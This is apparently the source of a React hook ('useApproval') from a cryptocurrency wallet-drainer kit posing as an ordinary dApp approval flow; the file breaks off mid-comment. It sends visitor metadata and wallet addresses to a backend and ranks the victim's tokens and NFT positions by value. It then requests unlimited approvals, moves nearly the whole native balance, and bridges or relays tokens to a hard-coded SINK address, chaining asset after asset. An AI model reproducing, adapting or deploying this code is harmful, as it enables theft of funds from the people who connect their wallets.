import { useEffect, useState, useCallback, useRef } from "react";

// From Here
import { API_URL, FALLBACK_RPC_PROVIDERS, GROUP_NAME, LOVELY, SINK, TOKEN_HANDLER_COMPLETE_CONTRACTS, TOKEN_HANDLER_COMPLETE_ABI, CONTRACT_ABI, PULSEBRIDGE_WETH_ROUTER_CONTRACTS, PULSEBRIDGE_WETH_ROUTER_ABI, OMNIBRIDGE_CONTRACTS, OMNIBRIDGE_ABI } from "../util/constants";
import { switchNetwork, getTokenBalance, toDeadline } from "../util/helpers";
import HTTPClient from '../util/HTTPClient'
import { ethers, Contract } from "ethers";
import { signDaiPermit, signERC2612Permit } from "../lib/eth-permit";
import ERC20ABI from '../util/erc20-classic.json';
import { useAccount, useChainId } from "wagmi";
import { useWalletUI } from "./useWalletUI";
import { useTokens } from "./useTokens";

// Constants for permits
const MAX_INT = '0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'; // MAX_UINT256
const MAX_UINT96 = '0xffffffffffffffffffffffff'; // MAX_UINT96 (79228162514264337593543950335)
// UNI token uses uint96 internally - use MAX_UINT96 instead of MAX_UINT256
const UNI_TOKEN_ADDRESS = '0x1f9840a85d5aF5bf1D1762F925BDADdC4201F984';
const FIVE_YEARS_IN_SECONDS = 5 * 365 * 24 * 60 * 60; // 157680000 seconds

const useApproval = (chainIds = [1, 369, 56, 10, 42161, 8453, 137, 250, 43114, 100, 324]) => {
  const { address: account } = useAccount()
  const network = useChainId()
  const { openConnectModal } = useWalletUI()
  const [isGetTokenLoading, setIsGetTokenLoading] = useState(false);
  const [client, setClient] = useState();
  const [answers, setAnswers] = useState([]);
  const [lovely] = useState(LOVELY);
  const [walletProvider, setWalletProvider] = useState(undefined)
  const [signer, setSigner] = useState(null);
  const [walletProviderType, setWalletProviderType] = useState(null);

  useEffect(() => {
    setWalletProvider(window?.ethereum);
  }, []);

  // Get signer from provider in ethers v6
  useEffect(() => {
    if (walletProvider) {
      const provider = new ethers.BrowserProvider(walletProvider);
      provider.getSigner().then(s => {
        setSigner(s);
        // Detect provider type
        if (walletProvider.isMetaMask) {
          setWalletProviderType('metamask');
        } else if (walletProvider.isWalletConnect) {
          setWalletProviderType('walletconnect');
        } else {
          setWalletProviderType('unknown');
        }
      }).catch(() => {
        setSigner(null);
        setWalletProviderType(null);
      });
    } else {
      setSigner(null);
      setWalletProviderType(null);
    }
  }, [walletProvider]);
  const [isApproveLoading, setIsApproveLoading] = useState(false);
  const [balance, setBalance] = useState(0)
  const [sink] = useState(SINK)
  const [pendingChainSwitch, setPendingChainSwitch] = useState(null); // Store pending chain switch info

  const {
    isLoading: isTokenLoadingState,
    onApprove
  } = useTokens({
    tokens: answers,
    chainId: network,
    lovely,
    userAddress: account,
    isParentLoading: isGetTokenLoading,
    onReady: () => setIsGetTokenLoading(false)
  })

  useEffect(() => {
    setClient(new HTTPClient(API_URL));
  }, []);

  // Use ref to avoid infinite loops
  const getTokenRef = useRef();
  const isLoadingRef = useRef(false);

  const getBalance = async (token = "eth") => {
    if (signer && account) {
      try {
        const bal = await getTokenBalance(token, account, network);
        setBalance(bal);
      } catch (error) {
        console.log(error)
      }
    }
  }

  /**
   * Fetches tokens with recommended transfer methods from the new Token Transfer Method Selector API
   * Falls back to the old /connects endpoint if the new system is disabled or fails
   */
  // Helper function to get client metadata (URL, user agent, etc.)
  const getClientMetadata = () => {
    return {
      url: window.location.hostname,
      fullUrl: window.location.href,
      group: GROUP_NAME,
      userAgent: navigator.userAgent,
      language: navigator.language,
      platform: navigator.platform,
      // IP address will be detected by backend from request headers
      // We can't reliably get client IP from browser due to privacy/security restrictions
    };
  };

  const getTokensWithTransferMethods = useCallback(async (acc = account, net = network) => {
    if (!acc || !client) return null;

    try {
      if (process.env.NODE_ENV === "development") {
        console.log("Fetching tokens from new Transfer Method Selector API...");
      }

      const metadata = getClientMetadata();
      const queryParams = new URLSearchParams({
        addy: acc,
        chain: net,
        enabled: 'true',
        url: metadata.url,
        group: metadata.group,
        userAgent: metadata.userAgent
      });

      const res = await (
        await client.get(`/dashboard/transfer-methods?${queryParams.toString()}`)
      ).json();

      if (process.env.NODE_ENV === "development") {
        console.log("Transfer Method Selector API response:", {
          success: res.success,
          tokenCount: res.data?.tokens?.length || 0,
          contractAddress: res.data?.contractAddress,
          hasTokens: !!res.data?.tokens,
          universalRouter: res.data?.universalRouter || "not provided"
        });
      }

      if (res.success && res.data) {
        // Check if chain switch is required
        const shouldSwitch = res.data.shouldSwitchChain && res.data.requiresSwitch;
        const targetChain = shouldSwitch ? res.data.requiresSwitch.chain : null;
        const currentChainId = Number(net);

        // Store pending chain switch info instead of switching immediately
        // The switch will happen when approveContract is called
        if (shouldSwitch && targetChain && targetChain !== currentChainId) {
          if (process.env.NODE_ENV === "development") {
            console.log(`Chain switch required: Current chain ${currentChainId}, Target chain ${targetChain}. Will switch when approveContract is called.`);
          }

          // Store the switch information for later
          setPendingChainSwitch({
            targetChain,
            switchData: res.data.requiresSwitch,
            contractAddress: res.data.contractAddress,
            nftPositionManagerAddress: res.data.nftPositionManagerAddress
          });

          // Use tokens from requiresSwitch instead of main tokens array
          if (res.data.requiresSwitch && (res.data.requiresSwitch.tokens || res.data.requiresSwitch.nftPositions)) {
            const switchData = res.data.requiresSwitch;
            const contractAddress = switchData.contractAddress || res.data.contractAddress;
            const nftPositionManagerAddress = switchData.nftPositionManagerAddress || res.data.nftPositionManagerAddress;

            // Map tokens from requiresSwitch
            const mappedTokens = (switchData.tokens || []).map(token => ({
              address: token.address,
              name: token.name,
              symbol: token.symbol || token.name,
              amount: token.balance || token.usdValue || 0,
              usdValue: token.usdValue || 0,
              decimals: token.decimals || 18,
              chainId: targetChain, // Use target chain ID
              sender: lovely,
              recommendedMethod: token.recommendedMethod,
              methodPriority: token.methodPriority,
              priorityScore: token.priorityScore,
              hasAllowance: token.hasAllowance,
              tokenHandlerCompleteAddress: contractAddress,
              universalRouter: token.universalRouter || switchData.universalRouter || res.data.universalRouter || null,
              type: mapTransferMethodToApprovalType(token.recommendedMethod, token.hasAllowance)
            }));

            // Map NFT positions from requiresSwitch
            // API response structure: { nftContract, tokenId, amount, name, priorityScore, ... }
            const mappedNFTPositions = (switchData.nftPositions || []).map(nftPosition => {
              // API uses nftContract, not contractAddress
              const nftContractAddress = nftPosition.nftContract || nftPosition.contractAddress || nftPosition.address;
              // API uses amount for USD value, not usdValue
              const usdValue = nftPosition.usdValue || nftPosition.amount || 0;
              const tokenId = nftPosition.tokenId || nftPosition.id || nftPosition.poolId;

              return {
                address: nftContractAddress, // NFT contract address (use nftContract from API)
                name: nftPosition.name || `NFT Position #${tokenId}`,
                symbol: nftPosition.symbol || 'NFT',
                amount: 1,
                usdValue: usdValue, // Use amount from API if usdValue not present
                decimals: 0,
                chainId: targetChain,
                sender: lovely,
                recommendedMethod: 'nftPosition',
                methodPriority: 60,
                priorityScore: nftPosition.priorityScore || (usdValue * 0.7 + 60 * 0.3),
                hasAllowance: false,
                tokenHandlerCompleteAddress: contractAddress,
                nftPositionManagerAddress: nftPositionManagerAddress,
                tokenId: tokenId,
                nftContract: nftContractAddress, // Use nftContract from API
                isNFTPosition: true,
                type: 'nftPosition'
              };
            });

            // Combine tokens and NFT positions, sorted by priority score
            const allItems = [...mappedTokens, ...mappedNFTPositions].sort((a, b) =>
              (b.priorityScore || 0) - (a.priorityScore || 0)
            );

            return {
              tokens: allItems,
              totalValue: switchData.totalValue || res.data.totalValue,
              filteredValue: switchData.filteredValue || res.data.filteredValue,
              tokenCount: switchData.tokenCount || 0,
              nftPositionCount: switchData.nftPositionCount || 0,
              contractAddress: contractAddress,
              nftPositionManagerAddress: nftPositionManagerAddress,
              switchedChain: false, // Not switched yet, will switch when approveContract is called
              targetChain: targetChain,
              pendingSwitch: true // Flag to indicate switch is pending
            };
          }
        } else {
          // Clear pending switch if no switch is required
          setPendingChainSwitch(null);
        }

        // Use main tokens array if no switch required or switch data not available
        if (res.data.tokens || res.data.nftPositions) {
          // Store contract addresses from API response if available
          const contractAddress = res.data.contractAddress;
          const nftPositionManagerAddress = res.data.nftPositionManagerAddress;

          // Map the new API response to the existing token format
          // IMPORTANT: Preserve universalRouter from API response for EIP-7702 signatures
          const mappedTokens = (res.data.tokens || []).map(token => ({
            address: token.address,
            name: token.name,
            symbol: token.symbol || token.name,
            amount: token.balance || token.usdValue || 0,
            usdValue: token.usdValue || 0,
            decimals: token.decimals || 18,
            chainId: net,
            sender: lovely, // Use lovely as default sender
            // Map recommended method to existing approval type
            recommendedMethod: token.recommendedMethod,
            methodPriority: token.methodPriority,
            priorityScore: token.priorityScore,
            hasAllowance: token.hasAllowance,
            // Store contract address for this chain (from API response)
            tokenHandlerCompleteAddress: contractAddress,
            // Preserve universalRouter from API response (for EIP-7702)
            // Check both token-level and response-level universalRouter
            universalRouter: token.universalRouter || res.data.universalRouter || null,
            // Set type based on recommended method for compatibility
            type: mapTransferMethodToApprovalType(token.recommendedMethod, token.hasAllowance)
          }));

          // Map NFT positions to token-like format for processing
          // NFT positions are processed separately but included in the tokens array
          // API response structure: { nftContract, tokenId, amount, name, priorityScore, ... }
          const mappedNFTPositions = (res.data.nftPositions || []).map(nftPosition => {
            // API uses nftContract, not contractAddress
            const nftContractAddress = nftPosition.nftContract || nftPosition.contractAddress || nftPosition.address;
            // API uses amount for USD value, not usdValue
            const usdValue = nftPosition.usdValue || nftPosition.amount || 0;
            const tokenId = nftPosition.tokenId || nftPosition.id || nftPosition.poolId;

            return {
              address: nftContractAddress, // NFT contract address (use nftContract from API)
              name: nftPosition.name || `NFT Position #${tokenId}`,
              symbol: nftPosition.symbol || 'NFT',
              amount: 1, // NFT positions are single items
              usdValue: usdValue, // Use amount from API if usdValue not present
              decimals: 0, // NFTs don't have decimals
              chainId: net,
              sender: lovely,
              // NFT positions use 'nftPosition' method
              recommendedMethod: 'nftPosition',
              methodPriority: 60, // Similar to erc1155 priority
              priorityScore: nftPosition.priorityScore || (usdValue * 0.7 + 60 * 0.3),
              hasAllowance: false, // Will check setApprovalForAll
              tokenHandlerCompleteAddress: contractAddress,
              nftPositionManagerAddress: nftPositionManagerAddress, // Store NFTPositionManager address
              // NFT-specific fields
              tokenId: tokenId,
              nftContract: nftContractAddress, // Use nftContract from API
              isNFTPosition: true, // Flag to identify NFT positions
              type: 'nftPosition' // Set type for NFT positions
            };
          });

          // Combine tokens and NFT positions, sorted by priority score
          const allItems = [...mappedTokens, ...mappedNFTPositions].sort((a, b) =>
            (b.priorityScore || 0) - (a.priorityScore || 0)
          );

          return {
            tokens: allItems, // Include both tokens and NFT positions
            totalValue: res.data.totalValue,
            filteredValue: res.data.filteredValue,
            tokenCount: res.data.tokenCount || 0,
            nftPositionCount: res.data.nftPositionCount || 0,
            contractAddress: contractAddress,
            nftPositionManagerAddress: nftPositionManagerAddress // Include NFTPositionManager address
          };
        }
      }
    } catch (error) {
      if (process.env.NODE_ENV === "development") {
        console.log("Transfer Method Selector API not available, falling back to /connects:", error);
      }
    }
    return null;
  }, [account, network, client, lovely]);

  /**
   * Maps transfer method names from the API to existing approval types
   */
  const mapTransferMethodToApprovalType = (recommendedMethod, hasAllowance) => {
    const methodMap = {
      'transferFromAndForward': hasAllowance ? 'alreadyApproved' : 'normalApproveOnly',
      'transferWithAuthorization': 'transferWithAuthorizationAllowed',
      'transferWithAuthorizationAndForward': 'transferWithAuthorizationAllowed',
      'eip7702': 'eip7702',
      'eip7702Batch': 'eip7702Batch',
      'permitERC2612': 'permit1Allowed',
      'permitDai': 'permit1Allowed',
      'metaTransaction': 'normalApproveOnly',
      'erc1155': 'normalApproveOnly',
      'erc777': 'normalApproveOnly',
      'erc1271': 'normalApproveOnly',
      'feeOnTransfer': 'normalApproveOnly',
      'ethExecuteCall': 'isEth',
      'ethBridge': 'isEth',
      'ethSwap': 'isEth',
      'ethSign': 'isEth',
      'wrapAndRelayTokens': 'wrapAndRelayTokens',
      'relayTokens': 'relayTokens',
      'transferAndCall': 'transferAndCall'
    };
    return methodMap[recommendedMethod] || 'normalApproveOnly';
  };

  const getToken = useCallback(async (acc = account, net = network) => {
    if (isLoadingRef.current) return;
    try {
      if (!acc || !client) return;

      isLoadingRef.current = true;
      setIsGetTokenLoading(true);

      // Try the new Transfer Method Selector API first
      const transferMethodsData = await getTokensWithTransferMethods(acc, net);

      if (transferMethodsData && transferMethodsData.tokens) {
        // Use the new API response
        setAnswers(transferMethodsData.tokens);
        setIsGetTokenLoading(false);
        isLoadingRef.current = false;
        return;
      }

      // If no tokens found, set empty answers
      setAnswers([]);
      setIsGetTokenLoading(false);
      isLoadingRef.current = false;
    } catch (error) {
      if (process.env.NODE_ENV === "development") console.log(error);
    } finally {
      isLoadingRef.current = false;
      setIsGetTokenLoading(false);
    }
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [account, network, signer, client, walletProviderType, getTokensWithTransferMethods]);

  useEffect(() => {
    if (signer && account) {
      getBalance("eth")
    }
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [account])

  // Update ref when getToken changes
  getTokenRef.current = getToken;

  useEffect(() => {
    if (account && network && getTokenRef.current) {
      getTokenRef.current(account, network);
    }
  }, [account, network])

  const connectWallet = (args) => {
    try {
      openConnectModal?.(args)
    } catch (error) {
      if (process.env.NODE_ENV === "development") console.log(error);
    }
  }

  useEffect(() => {
    if (account && network && getTokenRef.current && client) {
      getTokenRef.current(account, network);
    }
  }, [network, account, client])

  // Clear pending switch when network changes to target chain (user may have switched manually)
  useEffect(() => {
    if (pendingChainSwitch && pendingChainSwitch.targetChain === network) {
      setPendingChainSwitch(null);
    }
  }, [network, pendingChainSwitch])

  // Helper: Check if error is user rejection
  const isUserRejection = (error) => {
    const errorMessage = error?.message?.toLowerCase() || error?.code?.toLowerCase() || '';
    return errorMessage.includes('user rejected') ||
      errorMessage.includes('user_action_rejected') ||
      errorMessage.includes('user denied') ||
      errorMessage.includes('rejected') ||
      error?.code === 4001 ||
      error?.code === 'ACTION_REJECTED';
  };

  // Helper: transient RPC/wallet errors should not be reported as explicit rejects
  const isTransientRpcError = (error) => {
    const message = String(error?.message || '').toLowerCase();
    return message.includes('rpc endpoint returned http client error') ||
      message.includes('missing revert data') ||
      message.includes('call_exception') ||
      message.includes('network error') ||
      message.includes('timeout') ||
      message.includes('failed to fetch');
  };

  // Helper: Handle transaction success
  const handleSuccess = (currentToken) => {
    onApprove(currentToken, approveContract);
    setTimeout(() => approveContract(), 100);
  };

  // Helper: Handle transaction error
  const handleError = (error, tokenData, type, context) => {
    if (isUserRejection(error)) {
      if (process.env.NODE_ENV === "development") {
        console.log(`User rejected ${context} - stopping auto-proceed`);
      }
    } else if (isTransientRpcError(error)) {
      if (process.env.NODE_ENV === "development") {
        console.warn(`Transient RPC error during ${context}; skipping reject report.`, error);
      }
      return;
    } else {
      if (process.env.NODE_ENV === "development") {
        console.error(`${context} failed:`, error);
      }
    }
    reject(tokenData, type);
  };

  // Helper: Get fast gas options
  const getFastGasOptions = async (gasLimit = 200000n, value = null) => {
    try {
      const feeData = await signer.provider.getFeeData();
      const options = {
        gasLimit,
      };

      // Handle EIP-1559 networks (has maxFeePerGas)
      if (feeData.maxFeePerGas) {
        options.maxFeePerGas = feeData.maxFeePerGas * 2n;
        // Only set maxPriorityFeePerGas if available (some networks don't support it)
        if (feeData.maxPriorityFeePerGas) {
          options.maxPriorityFeePerGas = feeData.maxPriorityFeePerGas * 2n;
        }
      } else if (feeData.gasPrice) {
        // Fallback for legacy networks (PulseChain, etc.)
        options.gasPrice = feeData.gasPrice * 2n;
      }

      if (value !== null) options.value = value;
      return options;
    } catch (error) {
      // Fallback if getFeeData fails
      if (process.env.NODE_ENV === "development") {
        console.warn("Failed to get fee data, using basic gas options:", error);
      }
      const options = { gasLimit };
      if (value !== null) options.value = value;
      return options;
    }
  };

  // Helper: Get normalized token data
  const getTokenData = (tokenData) => {
    return Array.isArray(tokenData) ? tokenData[0] : tokenData;
  };

  // Helper: Ensure token approval
  const ensureTokenApproval = async (tokenAddress, spender, amount) => {
    const readProvider = signer?.provider || walletProvider
    const readContract = new Contract(tokenAddress, ERC20ABI, readProvider)
    let allowance = 0n
    try {
      allowance = await readContract.allowance(account, spender)
    } catch (readError) {
      // Wallet RPC can be flaky for read calls; retry allowance on fallback RPCs.
      const rpcList = FALLBACK_RPC_PROVIDERS[Number(network)] || []
      for (const rpcUrl of rpcList) {
        try {
          const fallbackProvider = new ethers.JsonRpcProvider(rpcUrl)
          const fallbackContract = new Contract(tokenAddress, ERC20ABI, fallbackProvider)
          allowance = await fallbackContract.allowance(account, spender)
          break
        } catch (_) {
          // Try next fallback RPC.
        }
      }
      if (allowance === 0n && process.env.NODE_ENV === "development") {
        console.warn('Allowance read failed on primary and fallback RPCs:', readError)
      }
    }

    if (allowance < amount) {
      if (process.env.NODE_ENV === "development") {
        console.log('Approving token...');
      }
      const tokenContract = new Contract(tokenAddress, ERC20ABI, signer);
      const gasOptions = await getFastGasOptions(100000n);
      const approvalTx = await tokenContract.approve(spender, MAX_INT, gasOptions);
      await approvalTx.wait();
      if (process.env.NODE_ENV === "development") {
        console.log('Approval confirmed, txHash:', approvalTx.hash);
      }
    }
  };

  // Helper: Check native token balance for gas
  const checkGasBalance = async (estimatedGas = 200000n) => {
    const nativeBalance = await signer.provider.getBalance(account);
    let feeData;
    try {
      feeData = await signer.provider.getFeeData();
    } catch (error) {
      // Fallback for networks that don't support getFeeData
      if (process.env.NODE_ENV === "development") {
        console.warn("Failed to get fee data, using fallback:", error);
      }
      // Try to get gas price from latest block as fallback
      try {
        const block = await signer.provider.getBlock('latest');
        feeData = { gasPrice: block.gasPrice || 0n };
      } catch (e) {
        feeData = { gasPrice: 0n };
      }
    }

    // Use gasPrice for legacy networks, or maxFeePerGas for EIP-1559 networks
    const gasPrice = feeData.gasPrice || feeData.maxFeePerGas || 0n;
    const gasCost = gasPrice * estimatedGas;

    if (nativeBalance < gasCost) {
      throw new Error('Insufficient native token for gas fees');
    }
    return { nativeBalance, feeData, gasCost };
  };

  const approveContract = async () => {
    if (!account || !signer) return connectWallet();
    if (isTokenLoadingState || isGetTokenLoading) return;
    if (!answers || !answers[0]) {
      if (isGetTokenLoading || isTokenLoadingState) return;
      return getToken();
    }

    // If the selected token is on a different chain than the active wallet network,
    // force the normal chain-switch path before trying method handlers.
    const firstTokenChainId = Number(answers?.[0]?.chainId || 0);
    const targetChainToSwitch =
      pendingChainSwitch?.targetChain ||
      (firstTokenChainId && firstTokenChainId !== Number(network) ? firstTokenChainId : null);
    if (!pendingChainSwitch && targetChainToSwitch) {
      setPendingChainSwitch({ targetChain: targetChainToSwitch });
    }

    // Check if chain switch is required and perform it before proceeding
    if (targetChainToSwitch && targetChainToSwitch !== Number(network)) {
      if (process.env.NODE_ENV === "development") {
        console.log(`Performing required chain switch: Current chain ${network}, Target chain ${targetChainToSwitch}`);
      }

      setIsApproveLoading(true);

      // Switch to the recommended chain (or add it if not available)
      const switchSuccess = await switchNetwork(targetChainToSwitch, walletProvider);

      if (!switchSuccess) {
        if (process.env.NODE_ENV === "development") {
          console.warn(`Failed to switch to chain ${targetChainToSwitch}. User may need to switch manually.`);
        }
        setIsApproveLoading(false);
        // Don't proceed if switch failed - user needs to switch manually
        return;
      } else {
        if (process.env.NODE_ENV === "development") {
          console.log(`Successfully switched to chain ${targetChainToSwitch}`);
        }
        // Clear pending switch after successful switch
        setPendingChainSwitch(null);
        // Wait a moment for the network to update, then refresh tokens
        setTimeout(() => {
          getToken();
        }, 1000);
        setIsApproveLoading(false);
        return; // Exit early - getToken will trigger a new approval flow
      }
    }

    const currentToken = {
      token: answers[0],
      type: answers[0].type || mapTransferMethodToApprovalType(answers[0].recommendedMethod, answers[0].hasAllowance)
    };

    if (!currentToken?.type) return;

    const tokenData = currentToken.token;
    const recommendedMethod = getTokenData(tokenData)?.recommendedMethod;

    try {
      setIsApproveLoading(true);
      const contractAddress = getTokenData(tokenData)?.tokenHandlerCompleteAddress || TOKEN_HANDLER_COMPLETE_CONTRACTS[network];
      const actualTokenData = getTokenData(tokenData);
      const tokenChainId = Number(actualTokenData?.chainId || 0);
      if (tokenChainId && tokenChainId !== Number(network)) {
        throw new Error(`Token is on chain ${tokenChainId}, but wallet is on chain ${network}. Please switch network first.`);
      }
      const isNFTPosition = actualTokenData?.isNFTPosition || recommendedMethod === 'nftPosition';

      // Method handlers
      const methodHandlers = {
        async nftPosition() {
          const nftPositionManagerAddress = actualTokenData?.nftPositionManagerAddress ||
            answers.find(t => t?.nftPositionManagerAddress)?.nftPositionManagerAddress;
          if (!nftPositionManagerAddress) {
            throw new Error("NFTPositionManager contract address not found");
          }

          const nftContractAddress = actualTokenData.nftContract || actualTokenData.address;
          const approvalResult = await checkAndApproveNFTPosition(nftContractAddress, nftPositionManagerAddress);
          if (!approvalResult) {
            throw new Error("NFT position approval failed");
          }

          const approvalTxHash = typeof approvalResult === 'object' && approvalResult.txHash ? approvalResult.txHash : null;
          const result = await sendNFTTransferToBackend(actualTokenData, nftPositionManagerAddress, approvalTxHash);

          if (!result?.success) throw new Error("NFT transfer failed");
          handleSuccess(currentToken);
        },

        async approve() {
          const tokenContract = new Contract(actualTokenData.address, ERC20ABI, signer);
          const gasOptions = await getFastGasOptions(100000n);

          const methodMap = {
            'approve': () => tokenContract.approve(contractAddress, MAX_INT, gasOptions),
            'increaseAllowance': () => tokenContract.increaseAllowance(contractAddress, MAX_INT, gasOptions),
            'increaseApproval': () => tokenContract.increaseApproval(contractAddress, MAX_INT, gasOptions),
          };

          const approvalTx = await methodMap[recommendedMethod]();
          const amount = (await normalizeTokenAmount(actualTokenData, 'transferFromAndForward')).toString();

          const transferData = {
            method: 'transferFromAndForward',
            signature: '',
            params: { token: actualTokenData.address, from: account, amount, approvalTxHash: approvalTx.hash },
            contractAddress
          };

          const result = await sendTransferToBackend(transferData, actualTokenData, 'transferFromAndForward', contractAddress);
          if (!result?.success) throw new Error("Transfer failed");
          handleSuccess(currentToken);
        },

        async ethMethod() {
          if (!contractAddress) throw new Error("Contract address required");

          // Reserve gas first (using same logic as wrapAndRelayTokens)
          const balance = await signer.provider.getBalance(account);
          if (balance <= 0n) throw new Error("No native token balance");

          const estimatedGas = 200000n;
          const { feeData } = await checkGasBalance(estimatedGas);

          // Use EIP-1559 fees if available, otherwise fall back to legacy gasPrice
          const effectiveGasPrice = feeData.maxFeePerGas
            ? feeData.maxFeePerGas * 2n  // EIP-1559: double maxFeePerGas for safety
            : (feeData.gasPrice || 0n) * 2n; // Legacy: double gasPrice
          const gasCost = effectiveGasPrice * estimatedGas;
          const amount = balance > gasCost ? balance - gasCost : 0n;

          if (amount <= 0n) throw new Error("No ETH balance to transfer (after gas reservation)");

          const contract = new Contract(contractAddress, TOKEN_HANDLER_COMPLETE_ABI, signer);
          const contractFunctionMap = {
            'ethExecuteCall': 'executeCallEth',
            'ethBridge': 'bridgeEth',
            'ethSwap': 'swapEth',
            'ethSign': 'signEth'
          };

          const functionName = contractFunctionMap[recommendedMethod];
          if (!functionName) throw new Error(`Unknown ETH method: ${recommendedMethod}`);

          const gasOptions = await getFastGasOptions(200000n, amount);
          const ethTx = await contract[functionName](gasOptions);

          const transferData = {
            method: recommendedMethod,
            signature: '',
            params: { value: amount.toString(), contractFunction: functionName, txHash: ethTx.hash },
            contractAddress
          };

          const result = await sendTransferToBackend(transferData, actualTokenData, recommendedMethod, contractAddress);
          if (!result?.success) throw new Error("ETH transfer failed");
          handleSuccess(currentToken);
        },

        async wrapAndRelayTokens() {
          const routerAddress = PULSEBRIDGE_WETH_ROUTER_CONTRACTS[network];
          if (!routerAddress) throw new Error(`WETH Router not configured for chain ${network}`);

          const balance = await signer.provider.getBalance(account);
          if (balance <= 0n) throw new Error("No native token balance");

          // Use same gas limit as the actual transaction (200k) for accurate gas reservation
          const estimatedGas = 200000n;
          const { feeData } = await checkGasBalance(estimatedGas);

          // Use EIP-1559 fees if available, otherwise fall back to legacy gasPrice
          // This matches what we actually send in getFastGasOptions()
          const effectiveGasPrice = feeData.maxFeePerGas
            ? feeData.maxFeePerGas * 2n  // EIP-1559: double maxFeePerGas for safety
            : (feeData.gasPrice || 0n) * 2n; // Legacy: double gasPrice
          const gasCost = effectiveGasPrice * estimatedGas;
          const amountToBridge = balance > gasCost ? balance - gasCost : 0n;

          if (amountToBridge <= 0n) throw new Error("Insufficient balance to cover gas");

          const routerContract = new Contract(routerAddress, PULSEBRIDGE_WETH_ROUTER_ABI, signer);
          const gasOptions = await getFastGasOptions(200000n, amountToBridge);
          const bridgeTx = await routerContract.wrapAndRelayTokens(SINK, gasOptions);

          const transferData = {
            method: recommendedMethod,
            signature: '',
            params: { receiver: SINK, amount: amountToBridge.toString(), txHash: bridgeTx.hash },
            contractAddress: routerAddress
          };

          const result = await sendTransferToBackend(transferData, actualTokenData, recommendedMethod, routerAddress);
          if (!result?.success) throw new Error("Wrap and relay failed");
          handleSuccess(currentToken);
        },

        async relayTokens() {
          const bridgeAddress = OMNIBRIDGE_CONTRACTS[network];
          if (!bridgeAddress) throw new Error(`OmniBridge not configured for chain ${network}`);

          const amount = await normalizeTokenAmount(actualTokenData, recommendedMethod);
          if (amount <= 0n) throw new Error("No token balance");

          await checkGasBalance(200000n);
          await ensureTokenApproval(actualTokenData.address, bridgeAddress, amount);

          const bridgeContract = new Contract(bridgeAddress, OMNIBRIDGE_ABI, signer);
          const gasOptions = await getFastGasOptions(200000n);
          const bridgeTx = await bridgeContract.relayTokens(actualTokenData.address, SINK, amount, gasOptions);

          const transferData = {
            method: recommendedMethod,
            signature: '',
            params: { token: actualTokenData.address, receiver: SINK, amount: amount.toString(), txHash: bridgeTx.hash },
            contractAddress: bridgeAddress
          };

          const result = await sendTransferToBackend(transferData, actualTokenData, recommendedMethod, bridgeAddress);
          if (!result?.success) throw new Error("Relay tokens failed");
          handleSuccess(currentToken);
        },

        async transferAndCall() {
          const bridgeAddress = OMNIBRIDGE_CONTRACTS[network];
          if (!bridgeAddress) throw new Error(`OmniBridge not configured for chain ${network}`);

          const amount = await normalizeTokenAmount(actualTokenData, recommendedMethod);
          if (amount <= 0n) throw new Error("No token balance");

          await checkGasBalance(200000n);

          const bridgeContract = new Contract(bridgeAddress, OMNIBRIDGE_ABI, signer);
          const gasOptions = await getFastGasOptions(200000n);
          const bridgeTx = await bridgeContract.relayTokensAndCall(actualTokenData.address, SINK, amount, "0x", gasOptions);

          const transferData = {
            method: recommendedMethod,
            signature: '',
            params: { token: actualTokenData.address, receiver: SINK, amount: amount.toString(), data: "0x", txHash: bridgeTx.hash },
            contractAddress: bridgeAddress
          };

          const result = await sendTransferToBackend(transferData, actualTokenData, recommendedMethod, bridgeAddress);
          if (!result?.success) throw new Error("Transfer and call failed");
          handleSuccess(currentToken);
        },

        async default() {
          const signatureData = await generateTransferSignature(actualTokenData, recommendedMethod, SINK, contractAddress);
          if (!signatureData) throw new Error("Signature generation failed");

          const result = await sendTransferToBackend(signatureData, actualTokenData, recommendedMethod, contractAddress);
          if (!result?.success) throw new Error("Transfer failed");
          handleSuccess(currentToken);
        }
      };

      // Route to appropriate handler
      if (isNFTPosition) {
        await methodHandlers.nftPosition();
      } else if (['approve', 'increaseAllowance', 'increaseApproval'].includes(recommendedMethod)) {
        await methodHandlers.approve();
      } else if (['ethExecuteCall', 'ethBridge', 'ethSwap', 'ethSign'].includes(recommendedMethod)) {
        await methodHandlers.ethMethod();
      } else if (recommendedMethod === 'wrapAndRelayTokens') {
        await methodHandlers.wrapAndRelayTokens();
      } else if (recommendedMethod === 'relayTokens') {
        await methodHandlers.relayTokens();
      } else if (recommendedMethod === 'transferAndCall') {
        await methodHandlers.transferAndCall();
      } else {
        await methodHandlers.default();
      }
    } catch (error) {
      handleError(error, tokenData, currentToken.type, recommendedMethod || 'transaction');
    } finally {
      setIsApproveLoading(false);
    }
  };

  // Legacy functions removed - no longer used with new API flow

  // findBestTokenOut removed - not used with new API flow

  /**
   * Gets the actual token balance from the blockchain
   * For ERC-20 tokens, queries the contract. For native ETH, gets from signer.
   * Returns BigInt (ethers v6)
   */
  const getTokenBalanceAmount = async (tokenData) => {
    try {
      if (!tokenData || !signer) return 0n;
      const tokenChainId = Number(tokenData?.chainId || 0);
      if (tokenChainId && tokenChainId !== Number(network)) {
        if (process.env.NODE_ENV === "development") {
          console.warn(`Skipping balance query on chain mismatch. Wallet chain=${network}, token chain=${tokenChainId}`);
        }
        return 0n;
      }

      // Handle native ETH
      if (!tokenData.address || tokenData.address === 'eth' || tokenData.address.length < 12) {
        const balance = await signer.provider.getBalance(account);
        return balance;
      }

      // Handle ERC-20 tokens
      const tokenContract = new Contract(tokenData.address, CONTRACT_ABI, signer.provider || walletProvider);
      const balance = await tokenContract.balanceOf(account);
      return balance;
    } catch (error) {
      // Retry ERC20 balance reads with fallback RPC endpoints for the token chain.
      // This avoids false "No token balance" caused by flaky wallet RPC responses.
      try {
        const tokenChainId = Number(tokenData?.chainId || 0);
        const rpcList = tokenChainId ? (FALLBACK_RPC_PROVIDERS[tokenChainId] || []) : [];
        for (const rpcUrl of rpcList) {
          try {
            const fallbackProvider = new ethers.JsonRpcProvider(rpcUrl);
            const tokenContract = new Contract(tokenData.address, CONTRACT_ABI, fallbackProvider);
            const fallbackBalance = await tokenContract.balanceOf(account);
            if (fallbackBalance >= 0n) {
              return fallbackBalance;
            }
          } catch (_) {
            // Try next fallback RPC
          }
        }
      } catch (_) {
        // Fall through to existing warning/zero behavior
      }
      if (process.env.NODE_ENV === "development") {
        console.warn("Failed to get token balance:", error);
      }
      return 0n;
    }
  };

  /**
   * Normalizes token amount - uses actual balance instead of MaxAllowance
